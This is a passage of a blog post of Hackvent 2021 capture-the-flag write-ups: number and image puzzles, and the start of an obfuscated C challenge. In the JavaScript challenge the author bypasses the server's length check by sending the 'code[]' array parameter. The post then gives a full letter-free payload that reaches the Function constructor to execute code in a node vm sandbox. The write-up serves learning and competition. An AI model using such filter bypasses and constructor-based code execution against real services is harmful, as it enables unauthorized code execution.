know&#8230; the flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>Step 1: On the image we see cistercian numbers. We can decode them with the website <a href=\"https:\/\/www.dcode.fr\/cistercian-numbers\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.dcode.fr\/cistercian-numbers<\/a>. The result is:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">2314 6344 6333 4675 2268 3533 763 5940 1707 7377 4022 4870 7382 6109 385 4221<\/pre>\n\n\n\n<p>Step 2: We convert all the numbers into the binary representation and <strong>add leading zeros<\/strong> to all numbers which have less than 13 binary-digits. This second step took hours to guess.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">0100100001010\n1100011001000\n1100010111101\n1001001000011\n0100011011100\n0110111001101\n0001011111011\n1011100110100\n0011010101011\n1110011010001\n0111110110110\n1001100000110\n1110011010110\n1011111011101\n0000110000001\n1000001111101<\/pre>\n\n\n\n<p>Step 3: We convert this numbers to their ASCII representation and get the flag. This can be automatically done with <a href=\"https:\/\/gchq.github.io\/CyberChef\/#recipe=From_Binary('Space',8)&amp;input=MDEwMDEwMDAwMTAxMAoxMTAwMDExMDAxMDAwCjExMDAwMTAxMTExMDEKMTAwMTAwMTAwMDAxMQowMTAwMDExMDExMTAwCjAxMTAxMTEwMDExMDEKMDAwMTAxMTExMTAxMQoxMDExMTAwMTEwMTAwCjAwMTEwMTAxMDEwMTEKMTExMDAxMTAxMDAwMQowMTExMTEwMTEwMTEwCjEwMDExMDAwMDAxMTAKMTExMDAxMTAxMDExMAoxMDExMTExMDExMTAxCjAwMDAxMTAwMDAwMDEKMTAwMDAwMTExMTEwMQ\" target=\"_blank\" rel=\"noreferrer noopener\">cyber-chef<\/a>. <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{$4n74_w45_4_m0nk_t00}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.10] Christmas Trophy<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"114\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19.png\" alt=\"\" class=\"wp-image-1719\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19.png 830w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19-300x41.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-19-768x105.png 768w\" sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>ice<\/em>. Hole in one!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>The elves thought Santa should relax a bit, so they&#8217;re inviting him to a round of golf. But the organizers must have understood, when they get there, what they get is keyboards instead of clubs!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Write JS code that prints&nbsp;<code>Hackvent<\/code>&nbsp;without using characters from&nbsp;<code>a-z<\/code>,&nbsp;<code>A-Z<\/code>,&nbsp;<code>\\<\/code>,&nbsp;<code>:<\/code>&nbsp;or&nbsp;<code>_<\/code>. The code should be at most 400 characters.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"379\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1024x379.png\" alt=\"\" class=\"wp-image-1720\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1024x379.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-300x111.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-768x284.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-1536x568.png 1536w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-20-2048x757.png 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">const express = require('express');\nconst path = require('path');\nconst vm = require('vm');\nconst hbs = require('hbs');\nconst app = express();\nconst flag = require('.\/flag');\napp.set('views', path.join(__dirname, 'views'));\napp.set('view engine', 'hbs');\napp.get('\/', function (req, res) {\n    let output = '';\n    const code = req.query.code;\n    if (code &amp;&amp; code.length &lt; 400 &amp;&amp; \/^[^a-zA-Z\\\\\\:\\_]*$\/.test(code)) {\n        try {\n            const result = new vm.Script(code).runInNewContext(undefined, {timeout: 500});\n            if (result === 'Hackvent') {\n                output = flag;\n            } else {\n                output = \"Bad result: \" + result;\n            }\n        } catch (e) {\n            console.log(e);\n            output = 'Exception :(';\n        }\n    } else {\n        output = \"Bad code\";\n    }\n    res.render('index', {output});\n});\napp.get('\/source', function (req, res) {\n    res.sendFile(path.join(__dirname, 'app.js'));\n});\nmodule.exports = app;<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>I had a lot of trouble solving this challenge. This was one of the challenges which I didn&#8217;t solve within 24 hours. <\/p>\n\n\n\n<p>I only solved the challenge because there is a (unintended) bug in the page, which allows to submit payloads longer than 400 characters. When submitting the code you can change the parameter from &#8220;code=&#8221; to &#8220;code[]=&#8221;. This results in the code variable becoming an array with one item and passing the size-check in the if clause &#8211; even if the code is longer than 400 characters. <\/p>\n\n\n\n<p>To create my solution I used the online NodeJS debugger <a rel=\"noreferrer noopener\" href=\"https:\/\/replit.com\/languages\/nodejs\" target=\"_blank\">https:\/\/replit.com\/languages\/nodejs<\/a> and I did run the application locally myself. I first elaborated a script which prints &#8220;Hackvent&#8221; and respects all the limitations except the length. To get the characters &#8220;S&#8221;, &#8220;g&#8221;, &#8220;m&#8221; and &#8220;C&#8221; I created the following loop which returns the string.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">\"0logwarndirtimetimeEndtimeLogtraceassertclearcountcountResetgroupgroupEndtabledebuginfodirxmlerrorgroupCollapsedConsoleprofileprofileEndtimeStampcontext\" <\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">i = 0; for (x in console) {\n  i += x;\n}<\/pre>\n\n\n\n<p>I assign a variable to the loop to reference it later and get all missing characters. The script which prints &#8220;Hackvent&#8221; looks like this:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">let c = ({} + \"\")[5];\nlet o = ({} + \"\")[1];\nlet n = ({}[1] + \"\")[1];\nlet s = ((\".\"==\"\")+\"\")[3];\nlet t = ((\"\"==\"\")+\"\")[0];\nlet r = ((\"\"==\"\")+\"\")[1];\nlet u = ((\"\"==\"\")+\"\")[2];\nlet e = ((\"\"==\"\")+\"\")[3];\nlet l = ((\".\"==\"\")+\"\")[2];\nlet f = ({}[1] + \"\")[4];\nlet i = ({}[1] + \"\")[5];\nlet a = ((\".\" - 1)+\"\")[1];\nlet d = ({}[1] + \"\")[2];\nlet _constructor = c + o + n + s + t + r + u + c + t + o + r;\nlet _return = r + e + t + u + r + n;\nlet _console = c + o + n + s + o + l + e;\nlet _flat = f+l+a+t;\nlet _find = f+i+n+d;\nlet _for = f + o + r;\nlet _in = i + n;\nlet _loop = \"(\u00e4 = '');\" + _for + \"(\u00f6 \" + _in + \" \" + _console + \") {( \u00e4 += \u00f6 )}\" + _return + \" \u00e4\"\nlet res = [][_find][_constructor](_loop)()\nconsole.log(res)\nlet _String = res[139]+t+r+i+n+res[2]\nlet _toString = t+o+_String\nlet h = (+(1+[0]+[1]))[_toString](2+[1])[1]\nlet _fromcharcode = f+r+o+res[12]+res[102]+h+a+r+res[102]+o+d+e\nconsole.log(_fromcharcode)\nlet solution = [][_flat][_constructor](_return + \" \" + _String +\".\"+_fromcharcode+\"(72,97,99,107,118,101,110,116)\")()\nconsole.log(solution)<\/pre>\n\n\n\n<p>Now, we need to create the final payload which we can send to the server. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">let c = \"({} + '')[5]\"\nlet o = \"({} + '')[1]\"\nlet n = \"({}[1] + '')[1]\"\nlet s = \"(('.'=='')+'')[3]\"\nlet t = \"((''=='')+'')[0]\"\nlet r = \"((''=='')+'')[1]\"\nlet u = \"((''=='')+'')[2]\"\nlet e = \"((''=='')+'')[3]\"\nlet l = \"(('.'=='')+'')[2]\"\nlet f = \"({}[1] + '')[4]\"\nlet i = \"({}[1] + '')[5]\"\nlet a = \"(('.' - 1)+'')[1]\"\nlet d = \"({}[1] + '')[2]\"\nlet _constructor = c + \"+\" + o + \"+\"+n + \"+\" + s + \"+\" + t + \"+\" + r + \"+\" + u + \"+\" + c + \"+\" + t + \"+\" + o + \"+\" + r\nlet _return = r + \"+\" + e + \"+\" + t + \"+\" + u + \"+\" + r + \"+\" + n\nlet _console = c + \"+\" + o + \"+\" + n + \"+\" + s + \"+\" + o + \"+\" + l + \"+\" + e\nlet _flat = f+ \"+\" +l+ \"+\" +a+ \"+\" +t\nlet _find = f+ \"+\" +i+ \"+\" +n+ \"+\" +d\nlet _for = f + \"+\" + o + \"+\" + r\nlet _in = i + \"+\" + n\nlet _loop = \"\\\"(\u00e4 = '');\\\"+\" + _for + \"+\\\"(\u00f6 \\\"+\" + _in + \"+\\\" \\\"+\" + _console + \"+\\\"){ \u00e4 += \u00f6 }\\\"+\" + _return + \"+\\\" \u00e4;\\\"\"\nlet res = \"[][\"+_find+\"][\"+_constructor+\"](\"+_loop+\")()\"\nconsole.log(\"[][\"+_find+\"][\"+_constructor+\"](\"+\"XXXXX)()\")\nconsole.log(\"Loop:\")\nconsole.log(_loop)\nconsole.log(\"######\")\nconsole.log(\"[][\"+_find+\"][\"+_constructor+\"](\"+_loop+\")()\")\n$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + '')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\nconsole.log(\"-----> \" + $[157])\nconsole.log(\"------------\")\nlet _String = \"$[157]+\"+ t + \"+\" + r + \"+\" + i + \"+\" + n + \"+\" + \"$[5]\"\nlet _toString = t + \"+\" + o + \"+\" + _String\nlet h = \"(+(1+[0]+[1]))[\" + _toString +\"](2+[1])[1]\"\nconsole.log(_String)\nconsole.log(_toString)\nconsole.log(h)\nlet _fromcharcode = f+ \"+\" +r+ \"+\" +o+ \"+$[29]+$[51]+\"+h+\"+\" +a+ \"+\" +r+ \"+$[51]+ \"+o+ \"+\" +d+ \"+\" +e\nconsole.log(\"From-CharCode:\")\nconsole.log(_fromcharcode)\nconsole.log(\"------------\")\nlet _sol = _return + \"+\\\" \\\"+\" +_String + \"+\\\".\\\"+\" +_fromcharcode +\"+\\\"(72,97,99,107,118,101,110,116)\\\"\"\nlet _solution =\"[][\"+_find+\"][\"+_constructor+\"](\"+_sol+\")()\"\nconsole.log(\"Solution:\")\nconsole.log(\"$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + '')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\")\nconsole.log(_solution)\nconsole.log(\"------------\")<\/pre>\n\n\n\n<p>Among many debug messages this script prints the payload which we can send to the server. The length of the payload is 1285 characters though, therefore we need to circumvent the length check as described in the beginning. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"js\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$=[][({}[1]+'')[4]+({}[1]+'')[5]+({}[1]+'')[1]+({}[1]+'')[2]][({}+'')[5]+({}+'')[1]+({}[1]+'')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({}+'')[5]+((''=='')+'')[0]+({}+'')[1]+((''=='')+'')[1]]('(\u00e4=0);'+({}[1]+'')[4]+({}+'')[1]+((''=='')+'')[1]+'(\u00f6 '+({}[1]+'')[5]+({}[1] + '')[1]+' '+({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+({} + '')[1]+(('.'=='')+'')[2]+((''=='')+'')[3]+'){\u00e4+=\u00f6}'+((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+' \u00e4;')();\n[][({}[1] + '')[4]+({}[1] + '')[5]+({}[1] + '')[1]+({}[1] + '')[2]][({} + '')[5]+({} + '')[1]+({}[1] + '')[1]+(('.'=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[1]+((''=='')+'')[2]+({} + '')[5]+((''=='')+'')[0]+({} + '')[1]+((''=='')+'')[1]](((''=='')+'')[1]+((''=='')+'')[3]+((''=='')+'')[0]+((''=='')+'')[2]+((''=='')+'')[1]+({}[1] + '')[1]+\" \"+$[157]+((''=='')+'')[0]+((''=='')+'')[1]+({}[1] + '')[5]+({}[1] + '')[1]+$[5]+\".\"+({}[1] + '')[4]+((''=='')+'')[1]+({} + '')[1]+$[29]+$[51]+(+(1+[0]+[1]))[((''=='')+'')[0]+({} + '')[1]+$[157]+((''=='')+'')[0]+((''=='')+'')[1]+({}[1] + '')[5]+({}[1] + '')[1]+$[5]](2+[1])[1]+(('.' - 1)+'')[1]+((''=='')+'')[1]+$[51]+ ({} + '')[1]+({}[1] + '')[2]+((''=='')+'')[3]+\"(72,97,99,107,118,101,110,116)\")()<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/solution-1-1024x361.png\" alt=\"\" class=\"wp-image-1772\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV{W4NN4 G0 G0LFING T0M0RR0W?}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.11] Oversized Gifts<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"824\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21.png\" alt=\"\" class=\"wp-image-1722\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21.png 824w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21-300x42.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-21-768x108.png 768w\" sizes=\"auto, (max-width: 824px) 100vw, 824px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>darkstar<\/em>. Ho, ho, ho&#8230;ly cow, that&#8217;s big!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>To ensure that Santa does not have to carry such a heavy load, our elves are always trying to shrink the gifts as much as possible. New technologies are constantly being developed in our laboratories. Unfortunately, an incident occurred during a test, when restoring the original size, an error occurred and now we are no longer able to achieve the original size.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Are you able to achieve an acceptable size?<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/72d85b7f-4325-432e-93ff-cfdc019306c6.png.bz2\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"989\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-1024x989.png\" alt=\"\" class=\"wp-image-1723\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-1024x989.png 1024w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-300x290.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22-768x742.png 768w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-22.png 1346w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>This picture is purely illustrative &#8211; we thought a bit of color might be nice \ud83d\ude09 Download the linked file!<\/em><\/figcaption><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This is one of the challenge which was very resource intensive and I struggled with my office laptop to solve it, as it took several hours to complete. <\/p>\n\n\n\n<p>The challenge requests us to resize a very large image. The problem is that we cannot open the image with any tool because it is too large. Luckily, I did find a program which can open the image and does the resizing for me. With <a rel=\"noreferrer noopener\" href=\"https:\/\/www.libvips.org\/\" target=\"_blank\">libvips<\/a> the image can be resized and we get the QR code. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$vips resize 72d85b7f-4325-432e-93ff-cfdc019306c6.png out.png 0.0078125 --vips-progress\nvips temp-21: 7104 x 7104 pixels, 8 threads, 128 x 128 tiles, 256 lines in buffer<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/flag-1-2024x1024.png\" alt=\"\" class=\"wp-image-1773\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{You_can_never_have_enough_RAM!}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21-Hidden] What? There is More?<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"116\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23.png\" alt=\"\" class=\"wp-image-1724\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23-300x43.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-23-768x109.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<p>What? You found another one? Lucky you!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>The hidden challenge can be solved with the same libvips program as the main challenge. I struggled even more with my laptop here. I had to reboot the notebook, add extra swap space and keep the computer running over night to get the hidden flag. <\/p>\n\n\n\n<p>In the large QR code a second small one is hidden. With the libvips program we can create tiles and find the second QR code inside. <\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">$ vips dzsave --depth one --tile-size=1024 --vips-progress 72d85b7f-4325-432e-93ff-cfdc019306c6.png hidden.png<\/pre>\n\n\n\n<p>This command creates a folder with 788544 images inside! Because the QR code has more content than the other images, we can sort the folder by size and the largest file contains the hidden QR code.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/hidden-1024x1024.jpeg\" alt=\"\" class=\"wp-image-1774\"\/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Flag<\/h2>\n\n\n\n<p>HV21{It&#8217;s_like_finding_a_needle_in_a_haystack}<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\"\/>\n\n\n\n<h1 class=\"wp-block-heading\">[HV21.12] Santa&#8217;s Shuffle<\/h1>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"816\" height=\"122\" src=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24.png\" alt=\"\" class=\"wp-image-1725\" srcset=\"https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24.png 816w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24-300x45.png 300w, https:\/\/sigterm.ch\/wp-content\/uploads\/2021\/12\/image-24-768x115.png 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Thanks!<\/h2>\n\n\n\n<p>This challenge is brought to you by&nbsp;<em>2d3<\/em>. What a beautiful mess!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Introduction<\/h2>\n\n\n\n<p>Oh no, the elves have forgotten to close the windows and the draft made mess of Santa&#8217;s code! Maybe you could clean it up?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Goal<\/h2>\n\n\n\n<p>Can you help Santa clean up&nbsp;<a href=\"https:\/\/sigterm.ch\/stuff\/hv21\/434eb425-6597-4fd0-bbd8-6f6e427a5f72.txt\" target=\"_blank\" rel=\"noreferrer noopener\">this chaos<\/a>?<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<p>This challenge looked pretty hard at first sight. Fortunately it wasn&#8217;t. I tried a new online tool, <a rel=\"noreferrer noopener\" href=\"https:\/\/www.onlinegdb.com\" target=\"_blank\">https:\/\/www.onlinegdb.com<\/a>, to solve this challenge. <\/p>\n\n\n\n<p>First, I beautified the code. Then, I used the debugger to step through the code. I discovered that the R(2) function call stops the application, when the input is wrong. Thus, I simply replaced all R(2) calls with 0x90 and got the flag:<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include\/*502_-_zU3X)}tM1#Hq$4D\"35*\/&lt;stdio.h>\/\/W6juf:tvs.]DrIoMM(axv0@|k?+jkES5r\n#define\/*&amp;jhm|0zs(*\/B\/*zDq|:OHcU~Dv|;7,FE)9s(Ue!5gM*\/break\t\/\/v9BF(TT1Gq\"19#?kJ2*H\n#define\/*JH8gDjl*\/C(x)\/*c9UOy:3*\/case\/*@MgHEK+94c9*\/x\/*bb]V+F#*\/:\t\/\/u$T._.$ms'cjF\n#define\/*XSGrEWMy94I!VMe_n*\/E(x)\/*UUG9F{)zJB*\/else\/*CJsY*9D|SfgQ-XL*\/x\t\/\/s{2GfRjU\n#define\/*jDdwh4pU,*\/F(x)\/*@48h|llEw&amp;qpgsJl7ifhb)*\/if\/*ux7-7_$}9*P*\/(x)\t\/\/s0qQes26\n#define\/*6#ZZoxYnO4xaPrjtX!?4IFw.o(J.F!aw;l1J*\/G\/*(K)A*N^+.p#'*\/getchar\/\/R3k7&amp;Fz\n#define\/*i3pPy[qc!eLd1x*\/H\/*yUP\"V{xqnjY*\/char\/\/9hek:99{qBf[JY4J]IQ(|uC?fP\"l+vyI8\n#define\/*&amp;#AH67b)-BfgJ*\/I(x)\/*3*N):*@uqGsPWx8qa6@m6Jh*\/int x\t\/\/FR9+X'O:zMD(h4vS1I\n#define\/*hJ5*\/N(x)\/*rjl|(eQP#|z*\/const\/*7,XJg5(b{55*\/x\t\/\/{v|REgeXz(Lt4i!ip}t$4NFO\n#define\/*KHZ4M6Iisfr*-*\/P\/*1=j~}wrY*,{Ed$LBv6RFjZL$.!~dYEQ,!nLcP*\/putchar\t\/\/%cf1H\n#define\/*NNpSIo2OmEA~By*\/R(x)\/*KO5g{I.-}d4*\/return\/*B1W|t9J#IMl*\/x\t\/\/&amp;{GOKv%1DeOR\n#define\/*{2&amp;kPmy$}*\/S\/*We3LM~2)9-S+vv0\"]F*\/switch\/\/(d't:h%G1PW'PMq:YT$99wc'Armhm\n#define\/*@:ZX?_W)3Ow*\/U(x)\/*m.ZxP@*\/unsigned\/*@':qb8*\/x\/\/Z0GPh4pWKUeua|U$V0JqZz0\n#define\/*1b*\/W(x)\/*A8M{Ww*\/while\/*lZ8(@={auRxbu(0pQ48vR]Y*\/(x)\t\/\/-gw7zlWYT.LW+rE3\nN (H) * d = \"\\0329>\\036=\\016\" \/*FzeM,;=3;T@Ddy_k}.3$Z? *\/ \"b\\040\\012!9\\016\"\t\/*uKjE\"vL!jSf\n\t\t\t\t\t\t\t\t         Ua&amp;hW[A#{mRI3s|ZsKm[9Hy *\/ \"\\034b\\0377b>\\035?-\\036=*\\xff\", *b = \"++T*+$T#+\"\n\t\t\t\t\t\t\t\t      \/*-4TuyBux\n\t\t\t\t\t\tR*\/ \"G++!}++g+Jn+'[{>qb+\/$++S+!H+:;v+Ig+*ut\"\n\t\t\t\t\t\t\/*#]UMNDx7&amp;g1Db08'fA?dG~;!$Agqcj9d7kY\n\t\t\t\t\t\t   Pb:6=LN:#n7g1^jEa(^~#Esv^?KT@_v7mv:)Gs:=84A'6d52X3:z'}Yc@ *\/\n  \">x0+t(++({+jy$+;1_+\"\n  \"&amp;(+4+%D+>%2++e+@+\" \/*.AdT0D+}1'2Y* *\/ \"6(E+^>+&amp;P+:^$++{TY+#46>^+'+++)~+\"\t\/*medVBKLr\n\t\t\t\t\t\t\t\t   |KgL,VcJT#h!C#3;YgsyYEW *\/ \"+'eH+++)\/+=+_q+\/S_>2+++cdX+P\"\n\t\t\t\t\t\t\t\t\/*pYGWqg@*YTM,{Oz,R:lfL3A\n\t\t\t\t\t\t\t\t   jmBLNi~9D~lXv9|Ro);*^CVq6pZ&amp;?kX6e1sY=)R;?eEO.=-jC5V *\/\n  \"&lt;'&lt;_X&lt;;&lt;&lt;4&lt;-&amp;]g:>++Q.DcG>\"\n  \"h-_*-\/@i-*-2.>tw#.NG\" \/*Sk3NzCn9HK[Xbmh)ZBNxOU6&amp;(4CsDo9HN *\/ \">-c_._>+'pk+_%d+\"\t\/*e\n\t\t\t\t\t\t\t\t\t\t\t   KkKW=SK%N^sG?J{BDv]beCstKi9AM;W]dc@0;VBGPQZPK9Nm *\/\n  \".>wHB+(+5kD+gXc++=.h[l[;q-:]\"\n  \"9X~&lt;u]-5{C,2o+V[fx\" \/*MLh3wxz0UW6UcLiirf*vwP.27~h$tpz1VBjakH-gN&amp;!-kp *\/\n  \"A-9v>$3%\"\n  \">d;+Yp+~++%+{f+T+!34+PW+Oc[5X0&lt;\"\t\/*RDCzF8Y0i,bbWa-MjYNq+,dO=,ty#U#z{740pXD{avr@3\n     MAtj *\/ \"H(+=+#=+F+)$T+Z*C++\"\n  \/*-MKeCw&amp;y*_Fq)_#Ac5{o4[6f5d#~AGi&amp;?g7YJ--Ck~fhXu*\/ \"J\"\n  